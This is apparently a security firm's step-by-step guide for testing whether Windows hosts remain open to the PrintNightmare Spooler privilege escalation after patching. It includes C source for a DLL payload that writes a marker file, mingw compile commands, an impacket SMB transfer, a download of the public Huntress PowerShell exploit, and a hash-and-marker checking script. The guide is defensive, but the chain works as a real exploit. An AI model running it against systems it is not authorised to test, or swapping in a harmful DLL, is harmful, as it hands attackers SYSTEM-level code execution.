PrintNightmare

Information on the Windows Spooler vulnerability - CVE-2021-1675 / CVE-2021-34527

Test if you are still vulnerable to PrintNightmare's privesc after patching

PrintNightmare (CVE-2021-1675 / CVE-2021-34527) is an exploit that abuses the AddPrinterDriver function of the Spooler service to execute files with high privileges.

There is some confusion around the patches released by Microsoft on 6th July 2021. It seems the RCE portion of the exploit is patched, but the privilege escalation may still be vulnerable.

We have put together a step-by-step guide to run a test PoC to see if the recent patch has been effective for your machine. This guide will do no damage to your machine, nor should it crash the machine or the spooler. It will simply write C:\PrintNightmare.txt

Thanks to John Hammond and Caleb Stewart from Huntress for releasing this PowerShell implementation of PrintNightmare.

Pre-check

get-service spooler


If the Spooler service isn't running, the machine isn't vulnerable and you can stop here. If it is running, continue with the test.

DLL

If you trust us enough, we have a pre-compiled DLL you can download from right here. Please check that the hash matches:

sha256sum nightmare.dll
#hash should be 894a086c62adbf9181e7c70f06f3d16364ce9019e9b041bc4d39f5c5193d8769

This DLL will just create an innocent, non-malicious file with no contents: C:\Printnightmare.txt

Otherwise, you are welcome to follow the guidance below to compile the DLL yourself.

Compile the non-malicious DLL

Run this on your attacker box

Install Dependencies

sudo apt install gcc-mingw-w64
sudo apt install g++-mingw-w64-x86-64

Write the DLL

nano nightmare.cpp

This DLL will just write an innocent, non-malicious file called Printnightmare.txt to C:\

#include <windows.h>

// Write a harmless marker file so we can tell that the Spooler loaded this DLL.
int printy()
{
    WinExec("cmd.exe /c echo > C:\\printnightmare.txt", 0);
    return 0;
}

// Write the marker once, when the DLL is first loaded into a process.
// Return TRUE so the loader treats the load as successful.
BOOL WINAPI DllMain(HINSTANCE hinstDLL, DWORD fdwReason, LPVOID lpvReserved)
{
    if (fdwReason == DLL_PROCESS_ATTACH)
        printy();
    return TRUE;
}

Compile DLL

sudo x86_64-w64-mingw32-g++ -c -DBUILDING_EXAMPLE_DLL nightmare.cpp
sudo x86_64-w64-mingw32-g++ -shared -o nightmare.dll nightmare.o -Wl,--out-implib,nightmare.a


Transfer DLL however you like, impacket's smbserver.py works

In Kali

sudo impacket-smbserver kali . -smb2support


Copy from Kali to Windows

:: I copied mine into C:\
copy \\yourip\kali\nightmare.dll C:\


Exploit

Pull the PowerShell exploit, written by John Hammond and Caleb Stewart from Huntress

invoke-webrequest -uri "https://raw.githubusercontent.com/calebstewart/CVE-2021-1675/main/CVE-2021-1675.ps1" -UseBasicParsing -outfile CVE-2021-1675.ps1

Deploy Exploit

import-module .\CVE-2021-1675.ps1
Invoke-Nightmare -DLL "C:\nightmare.dll"


Check C:\ for PrintNightmare.txt


It doesn't matter what its contents are; it only matters that it exists.
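As an added example (not part of the original guide and not the Huntress script), the PowerShell below bundles the checks that sit around the test: it confirms the Spooler state, verifies the DLL hash against the value given above before the DLL is used, and afterwards reports whether the marker file appeared and removes it. The function names and the paths C:\nightmare.dll and C:\PrintNightmare.txt are assumptions matching the steps above.

```powershell
# Added example, not from the original guide. Paths and function names are assumptions.
$ExpectedHash = '894a086c62adbf9181e7c70f06f3d16364ce9019e9b041bc4d39f5c5193d8769'
$DllPath      = 'C:\nightmare.dll'
$MarkerPath   = 'C:\PrintNightmare.txt'

function Test-PrintNightmarePrecheck {
    # Step 1: if the Spooler service is not running, the host is not exposed; nothing to test.
    $svc = Get-Service -Name Spooler -ErrorAction SilentlyContinue
    if (-not $svc -or $svc.Status -ne 'Running') {
        Write-Host "Spooler is not running; this host is not exposed to the privesc."
        return $false
    }

    # Step 2: refuse to use a DLL whose SHA256 does not match the published value.
    if (-not (Test-Path $DllPath)) { throw "DLL not found at $DllPath" }
    $actual = (Get-FileHash -Path $DllPath -Algorithm SHA256).Hash   # -ne is case-insensitive
    if ($actual -ne $ExpectedHash) {
        throw "Hash mismatch for ${DllPath}: expected $ExpectedHash, got $actual"
    }

    Write-Host "Spooler running and DLL hash verified; ready to run Invoke-Nightmare."
    return $true
}

function Test-PrintNightmareResult {
    # Step 3: after Invoke-Nightmare, the marker's existence is the only signal that matters.
    if (Test-Path $MarkerPath) {
        Write-Warning "$MarkerPath exists: the Spooler loaded the DLL, so this host is still vulnerable."
        Remove-Item -Path $MarkerPath -Force   # tidy up the test artifact
        return $true
    }
    Write-Host "$MarkerPath not found: the patch appears effective on this host."
    return $false
}
```

Run Test-PrintNightmarePrecheck before the Invoke-Nightmare step and Test-PrintNightmareResult after it; a $true from the second function means the privilege escalation still works on that machine and it needs further remediation.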

For any questions, comments, and criticisms, please find us on Twitter at LABS or on MAIN